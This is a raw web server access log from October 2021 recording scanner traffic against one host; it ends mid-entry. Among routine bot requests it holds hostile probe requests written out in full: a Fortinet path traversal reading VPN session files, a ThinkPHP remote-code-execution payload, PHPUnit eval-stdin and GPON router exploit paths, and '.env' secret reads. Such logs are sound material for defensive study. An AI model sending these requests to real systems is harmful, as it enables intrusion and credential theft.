[06/Oct/2021:15:34:40 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Oct/2021:15:49:25 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [06/Oct/2021:16:39:44 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.195.251.49] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [06/Oct/2021:17:59:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Oct/2021:19:11:23 +0000] 444 - GET https 64.22.31.253 "/solr/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Oct/2021:20:51:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Oct/2021:22:21:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [06/Oct/2021:22:33:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.43] [Length 0] [Gzip -] "-" "-" [06/Oct/2021:22:33:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.43] [Length 252] [Gzip -] "-" "-" [06/Oct/2021:22:33:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [06/Oct/2021:22:49:05 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Oct/2021:22:49:05 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Oct/2021:22:49:05 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Oct/2021:22:49:05 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Oct/2021:22:49:05 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Oct/2021:22:49:05 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Oct/2021:22:58:07 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [06/Oct/2021:23:25:22 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [06/Oct/2021:23:48:02 +0000] 400 - HEAD http localhost "/" [Client 206.189.37.174] [Length 0] [Gzip -] "-" "-" [06/Oct/2021:23:48:02 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 206.189.37.174] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [06/Oct/2021:23:48:03 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 206.189.37.174] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [06/Oct/2021:23:48:03 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 206.189.37.174] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [06/Oct/2021:23:48:04 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 206.189.37.174] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [06/Oct/2021:23:48:04 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 206.189.37.174] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [06/Oct/2021:23:48:05 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 206.189.37.174] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [06/Oct/2021:23:48:06 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 206.189.37.174] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [06/Oct/2021:23:48:06 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 206.189.37.174] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [06/Oct/2021:23:48:07 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 206.189.37.174] [Length 252] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [06/Oct/2021:23:48:07 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 206.189.37.174] [Length 0] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [06/Oct/2021:23:48:08 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 206.189.37.174] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [06/Oct/2021:23:48:08 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 206.189.37.174] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [07/Oct/2021:00:06:26 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.202.249] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Oct/2021:01:14:00 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [07/Oct/2021:02:10:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [07/Oct/2021:02:19:47 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:02:19:48 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:02:47:30 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 212.47.252.74] [Length 0] [Gzip -] "curl/7.29.0" "-" [07/Oct/2021:03:12:43 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:03:12:44 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:03:34:49 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Oct/2021:03:34:50 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Oct/2021:03:34:53 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Oct/2021:03:34:54 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [07/Oct/2021:03:34:57 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Oct/2021:03:34:57 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Oct/2021:03:34:59 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Oct/2021:03:35:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Oct/2021:03:35:03 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [07/Oct/2021:03:35:04 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Oct/2021:03:35:05 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Oct/2021:03:35:07 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Oct/2021:04:32:40 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [07/Oct/2021:04:51:26 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.112.26] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Oct/2021:04:53:57 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Oct/2021:04:56:44 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Oct/2021:06:24:21 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.198.8] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Oct/2021:07:06:31 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:07:06:31 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:07:11:33 +0000] 444 - GET https guacamole.moralanimal.net "/wordpress/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:07:26:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Oct/2021:07:53:13 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 68.183.1.134] [Length 0] [Gzip -] "curl/7.3.2" "-" [07/Oct/2021:08:05:00 +0000] 444 - GET https 64.22.31.253 "/download/dniapi/" [Client 185.53.90.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [07/Oct/2021:08:08:23 +0000] 444 - GET https guacamole.moralanimal.net "/news/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:08:08:50 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:08:08:51 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:08:10:41 +0000] 444 - GET https 64.22.31.253 "/download/dniapi/" [Client 185.53.90.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [07/Oct/2021:08:24:40 +0000] 444 - GET https 64.22.31.253 "/download/dniapi/" [Client 185.53.90.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [07/Oct/2021:08:30:27 +0000] 444 - GET https 64.22.31.253 "/download/dniapi/" [Client 185.53.90.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [07/Oct/2021:08:46:15 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 68.183.1.134] [Length 0] [Gzip -] "curl/7.3.2" "-" [07/Oct/2021:09:59:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.204.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Oct/2021:10:09:06 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [07/Oct/2021:10:34:33 +0000] 444 - GET https guacamole.moralanimal.net "/wp/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:10:56:27 +0000] 444 - GET https guacamole.moralanimal.net "/web/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:12:12:44 +0000] 444 - GET https guacamole.moralanimal.net "/blog/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:12:17:36 +0000] 444 - GET https guacamole.moralanimal.net "/site/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:12:48:17 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.201.33] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Oct/2021:13:51:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Oct/2021:13:52:17 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:13:52:17 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:14:15:47 +0000] 444 - GET https localhost "/" [Client 170.106.115.15] [Length 0] [Gzip -] "curl/7.64.1" "-" [07/Oct/2021:15:07:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 164.90.209.55] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [07/Oct/2021:15:18:58 +0000] 444 - GET https guacamole.moralanimal.net "/test/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:15:26:06 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [07/Oct/2021:15:26:13 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [07/Oct/2021:15:38:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.57] [Length 0] [Gzip -] "-" "-" [07/Oct/2021:15:38:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "-" "-" [07/Oct/2021:15:38:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [07/Oct/2021:15:58:12 +0000] 444 - GET https guacamole.moralanimal.net "/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:17:01:44 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:17:01:44 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:17:42:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Oct/2021:17:56:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.155.101.3] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [07/Oct/2021:18:17:45 +0000] 444 - GET https guacamole.moralanimal.net "/cms/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:18:46:18 +0000] 444 - GET https guacamole.moralanimal.net "/en/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:19:35:40 +0000] 444 - GET https guacamole.moralanimal.net "/new/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:19:37:56 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:19:37:57 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:20:46:14 +0000] 444 - GET https guacamole.moralanimal.net "/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:20:47:54 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Oct/2021:20:47:54 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Oct/2021:20:47:54 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Oct/2021:20:47:54 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Oct/2021:20:47:54 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Oct/2021:20:47:54 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Oct/2021:20:52:53 +0000] 444 - GET https guacamole.moralanimal.net "/home/wp-login.php" [Client 185.204.160.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [07/Oct/2021:21:31:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Oct/2021:21:31:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.141] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [07/Oct/2021:21:31:52 +0000] 400 - - https localhost "-" [Client 23.129.64.141] [Length 154] [Gzip -] "-" "-" [07/Oct/2021:21:31:54 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.177] [Length 0] [Gzip -] "-" "-" [07/Oct/2021:21:31:55 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.177] [Length 0] [Gzip -] "-" "-" [07/Oct/2021:21:32:03 +0000] 400 - - https localhost "-" [Client 23.129.64.177] [Length 154] [Gzip -] "-" "-" [07/Oct/2021:21:35:41 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:21:35:41 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Oct/2021:23:15:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.194.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [08/Oct/2021:00:07:11 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.199.150] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Oct/2021:00:18:11 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [08/Oct/2021:00:18:11 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 